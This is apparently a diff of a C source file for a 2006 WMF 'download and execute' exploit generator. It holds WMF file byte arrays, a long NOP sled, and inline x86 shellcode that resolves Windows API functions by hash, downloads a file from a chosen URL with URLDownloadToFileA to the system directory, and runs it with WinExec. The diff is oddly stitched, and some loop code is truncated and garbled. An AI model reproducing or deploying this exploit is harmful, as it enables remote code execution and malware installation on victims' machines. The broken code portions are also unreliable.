-	0x0A, 0x00, 0x0A, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00,
-	0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
-	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0xDD,
-	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0xF6, 0x02,
-	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
-	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00,
-	0x32, 0x0A, 0x60, 0xEB, 0xFD, 0x02, 0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
-	0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00,
-	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
-	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
-	0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x34, 0x03, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00,
-	0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
-	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
-	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x3B, 0x03,
-	0x07, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00, 0x0B, 0x00, 0x05, 0x00,
-	0x0C, 0x00, 0x0C, 0x4F, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
-	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
-	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
-	0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x7D, 0x03, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00,
-	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
-	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
-	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0xF7, 0x62, 0x00,
-	0x02, 0x01, 0x01, 0x00, 0x31, 0x00, 0x00, 0xC3, 0x32, 0x0A, 0x79, 0x02, 0xD2, 0x01, 0x1C, 0x00,
-	0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
-	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x0B, 0x00,
-	0x08, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00,
-	0x05, 0x00, 0x08, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x11, 0x00,
-	0x0A, 0x00, 0x08, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00,
-	0x0C, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00,
-	0x00, 0x00, 0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x04, 0x00, 0x10, 0x00,
-	0x00, 0x00, 0xFB, 0x02, 0x10, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00,
-	0x00, 0xEE, 0x01, 0x02, 0x02, 0x22, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x00, 0xEE, 0x04, 0x00,
-	0x00, 0x00, 0x2D, 0x01, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x0F, 0x00,
-	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00,
-	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
-	0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00,
-	0x00, 0x00, 0x00, 0x00
-};
-
-
-// Shellcode string
-unsigned char  sc[1024] = {0};
-unsigned int   Sc_len;
-
-// ASM shellcode main function
-void    ShellCode();
-
-// Get function hash
-static DWORD __stdcall GetHash ( char *c )
-{
-   DWORD h = 0;
-
-   while ( *c )
-   {
-       __asm ror h, HASH_KEY
-
-       h += *c++;
-   }
-   return( h );
-}
-
-void Make_ShellCode(char *url1)
-{
-   unsigned char  *pSc_addr;
-   unsigned int   Enc_key=ENC_KEY;
-   unsigned long  dwHash[100];
-   unsigned int   dwHashSize;
-   int i,j,k,l;
-
-
-   // Get functions hash
-   //printf("[+] Get functions hash strings.\r\n");
-   for (i=0;;i++)
-   {
-       if (functions[i][0] == '\x0') break;
-
-       dwHash[i] = GetHash((char*)functions[i]);
-       //printf("\t%.8X\t%s\n", dwHash[i], functions[i]);
-   }
-   dwHashSize = i*4;
-
-
-   // Deal with shellcode
-   pSc_addr = (unsigned char *)ShellCode;
-
-   for (k=0;k0; i--)
-   {
-       l = 0;
-       for(j=DECODE_LEN; j ebx)
-       dec     ebx
-       xor     ecx,ecx
-       mov     cl,0xFF                     // Decode len
-
-   decode_loop:
-       xor     byte ptr [ebx+ecx],ENC_KEY     // Decode key
-       loop    decode_loop
-       jmp     short decode_ok
-
-decode_end:
-       call    decode_start
-
-decode_ok:
-
-//--------------------------------------------------------------------
-//
-// ShellCode
-//
-//--------------------------------------------------------------------
-       jmp     sc_end
-
-sc_start:
-       pop     edi                         // Hash string start addr (esp -> edi)
-
-       // Get kernel32.dll base addr
-       mov     eax, fs:0x30                // PEB
-       mov     eax, [eax+0x0c]             // PROCESS_MODULE_INFO
-       mov     esi, [eax+0x1c]             // InInitOrder.flink
-       lodsd                               // eax = InInitOrder.blink
-       mov     ebp, [eax+8]                // ebp = kernel32.dll base address
-
-       mov     esi, edi                    // Hash string start addr -> esi
-
-       // Get function addr of kernel32
-       push    4
-       pop     ecx
-
-   getkernel32:
-       call    GetProcAddress_fun
-       loop    getkernel32
-
-       // Get function addr of urlmon
-       push    0x00006e6f
-       push    0x6d6c7275                 // urlmon
-       push    esp
-       call    ADDR_LoadLibraryA          // LoadLibraryA("urlmon");
-
-       mov     ebp, eax                   // ebp = urlmon.dll base address
-
-/*
-       push    1
-       pop     ecx
-
-   geturlmon:
-       call    GetProcAddress_fun
-       loop    geturlmon
-*/
-       call    GetProcAddress_fun
-
-       // url start addr = edi
-
-LGetSystemDirectoryA:
-       sub     esp, 0x20
-       mov     ebx, esp
-
-       push    0x20
-       push    ebx
-      call   ADDR_GetSystemDirectoryA     // GetSystemDirectoryA
-
-LURLDownloadToFileA:
-       // eax = system path size
-       // URLDownloadToFileA url save to a.exe
-       mov     dword ptr [ebx+eax], 0x652E555C           // "\U.e"
-       mov     dword ptr [ebx+eax+0x4], 0x00006578       // "xe"
-       xor     eax, eax
-       push    eax
-       push    eax
-       push    ebx                         // %systemdir%\U.exe
-       push    edi                         // url
-       push    eax
-call    ADDR_URLDownloadToFileA     // URLDownloadToFileA
-
-//LWinExec:
-               mov     ebx, esp
-               push    1//executes in SW_SHOW, push 0 if you wanna in SW_HIDE..
-               push    ebx
-               call    ADDR_WinExec                // WinExec(%systemdir%\a.exe);
-
-Finished:
-       //push    1
-       call    ADDR_ExitProcess            // ExitProcess();
-
-GetProcAddress_fun:
-       push    ecx
-       push    esi
-
-       mov     esi, [ebp+0x3C]             // e_lfanew
-       mov     esi, [esi+ebp+0x78]         // ExportDirectory RVA
-       add     esi, ebp                    // rva2va
-       push    esi
-       mov     esi, [esi+0x20]              // AddressOfNames RVA
-       add     esi, ebp                    // rva2va
-       xor     ecx, ecx
-       dec     ecx
-
-   find_start:
-       inc     ecx
-       lodsd
-       add     eax, ebp
-       xor     ebx, ebx
-
-   hash_loop:
-       movsx   edx, byte ptr [eax]
-       cmp     dl, dh
-       jz      short find_addr
-       ror     ebx, HASH_KEY               // hash key
-       add     ebx, edx
-       inc     eax
-       jmp     short hash_loop
-
-   find_addr:
-       cmp     ebx, [edi]                  // compare to hash
-       jnz     short find_start
-       pop     esi                         // ExportDirectory
-       mov     ebx, [esi+0x24]             // AddressOfNameOrdinals RVA
-       add     ebx, ebp                    // rva2va
-       mov     cx, [ebx+ecx*2]             // FunctionOrdinal
-       mov     ebx, [esi+0x1C]             // AddressOfFunctions RVA
-       add     ebx, ebp                    // rva2va
-       mov     eax, [ebx+ecx*4]            // FunctionAddress RVA
-       add     eax, ebp                    // rva2va
-       stosd                               // function address save to [edi]
-
-       pop     esi
-       pop     ecx
-       ret
-
-sc_end:
-       call sc_start
-
-       PROC_END                            //C macro to end proc
-   }
-}
-
-// milw0rm.com [2006-01-15]
+/*
+\
+/		WMF nDay download() Exploit Generator
+\		       by Unl0ck Research Team
+/
+\
+/     greetz: 
+			rst/ghc { ed, uf0, fost },
+			uKt { choix, nekd0, payhash, antq }, 
+			blacksecurity { #black } , 
+			0x557 { kaka, swan, sam, nolife }, 
+			sowhat, tty64 { izik };
+
+	This sploit is now full shit, so... 
+	kiddies party has been started!!!
+
+urs, 
+darkeagle
+\
+/
+*/
+
+#include 
+#include 
+
+#pragma comment(lib, "ws2_32")
+
+// Use for find the ASM code
+#define PROC_BEGIN                    __asm _emit 0x90 __asm  _emit 0x90\
+                                      __asm _emit 0x90 __asm  _emit 0x90\
+                                      __asm _emit 0x90 __asm  _emit 0x90\
+                                      __asm _emit 0x90 __asm  _emit 0x90
+#define PROC_END                       PROC_BEGIN
+#define SEARCH_STR                     "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+#define SEARCH_LEN                     8
+#define MAX_SC_LEN                     2048
+#define HASH_KEY                       13
+
+// Define Decode Parameter
+#define DECODE_LEN                     21
+#define SC_LEN_OFFSET                  7
+#define ENC_KEY_OFFSET                 11
+#define ENC_KEY                        0xff
+
+
+// Define Function Addr
+#define ADDR_LoadLibraryA              [esi]
+#define ADDR_GetSystemDirectoryA       [esi+4]
+#define ADDR_WinExec                   [esi+8]
+#define ADDR_ExitProcess               [esi+12]
+#define ADDR_URLDownloadToFileA        [esi+16]
+
+// Need functions
+unsigned char functions[100][128] =
+{                                           // [esi] stack layout
+   // kernel32 4                           // 00 kernel32.dll
+   {"LoadLibraryA"},                       //    [esi]
+   {"GetSystemDirectoryA"},                //    [esi+4]
+   {"WinExec"},                            //    [esi+8]
+   {"ExitProcess"},                        //    [esi+12]
+   // urlmon  1                            // 01 urlmon.dll
+   {"URLDownloadToFileA"},                 //    [esi+16]
+   {""},
+};
+
+
+
+unsigned char head1[512] = {
+	0x01, 0x00, 0x09, 0x00, 0x00, 0x03, 0x52, 0x1F, 0x00, 0x00, 0x06, 0x00, 0x3D, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x18, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
+	0xFF, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0x85, 0x00,
+	0xD0, 0x02, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF,
+	0xFF, 0xFF, 0x02, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x23, 0x00,
+	0xFF, 0xFF, 0xFF, 0xFF, 0x04, 0x00, 0x1B, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x14, 0x00, 0x20, 0x00,
+	0xB8, 0x00, 0x32, 0x06, 0x00, 0x00, 0xFF, 0xFF, 0x4F, 0x00, 0x14, 0x00, 0x00, 0x00, 0x4D, 0x00,
+	0x69, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x0A, 0x00, 0x54, 0x4E,
+	0x50, 0x50, 0x00, 0x00, 0x02, 0x00, 0xF4, 0x03, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00,
+	0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x03, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x26, 0x06,
+	0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00, 0x01, 0x00, 0x00, 0x00,
+	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0B, 0x02, 0x00, 0x00,
+	0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0C, 0x02, 0xD0, 0x02, 0xC0, 0x03, 0x04, 0x00, 0x00, 0x00,
+	0x04, 0x01, 0x0D, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x66, 0x00,
+	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02,
+	0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
+	0x1D, 0x06, 0x21, 0x00, 0xF0, 0x00, 0xD0, 0x02, 0xC0, 0x03, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0xFF, 0xFF,
+	0xFF, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0xF0, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x10, 0x00,
+	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x16, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x47, 0x00,
+	0x00, 0x00, 0x8F, 0x02, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0xC1, 0x02, 0x00, 0x00, 0x08, 0x00,
+	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x06, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x0D, 0x00,
+	0x00, 0x00, 0xFB, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x01, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00,
+	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0x00, 0x00, 0x00, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
+	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x10, 0x00, 0x00, 0x00,
+	0x26, 0x06, 0x09, 0x00, 0x16, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90
+};
+
+unsigned char head2[15220] = {
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
